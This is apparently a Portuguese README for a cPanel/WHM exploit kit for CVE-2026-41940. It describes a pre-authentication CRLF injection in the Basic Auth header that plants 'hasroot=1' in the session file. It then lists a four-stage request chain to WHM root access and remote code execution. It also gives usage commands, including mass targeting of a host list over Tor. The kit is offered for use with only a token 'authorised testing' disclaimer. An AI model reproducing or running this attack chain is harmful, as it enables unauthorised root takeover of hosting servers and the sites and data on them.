
cPanel/WHM CVE-2026-41940 exploit de injeção CRLF para bypass de autenticação
Kit de testes de segurança para cPanel/WHM. Implementa o bypass de autenticação por injeção de CRLF CVE-2026-41940 e o pivô de privilégios pós-exploração.
| Script | Finalidade |
|---|---|
cpanel_exploit.py | CVE-2026-41940: injeção de CRLF → bypass de autenticação WHM → acesso root |
Tipo: Injeção de CRLF → Bypass de Autenticação → RCE como root
Afetados: cPanel/WHM < versões corrigidas
Ataque: A injeção de CRLF pré-autenticação no cabeçalho Basic Auth injeta no arquivo de sessão do lado do servidor, elevando uma sessão não autenticada para root do WHM.
hasroot=1Estágio 1: POST /login/?login_only=1 → gera sessão pré-autenticação
Estágio 2: GET / Authorization:Basic <CRLF> → injeta hasroot=1, vaza token cpsess
Estágio 3: GET /scripts2/listaccts → aciona gadget de propagação de cache de sessão
Estágio 4: GET /cpsess[TOKEN]/json-api/version → HTTP 200 + versão = ACESSO ROOT
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # apenas verificação de CRLF, sem escalonamento de privilégios
Apenas para testes de penetração autorizados.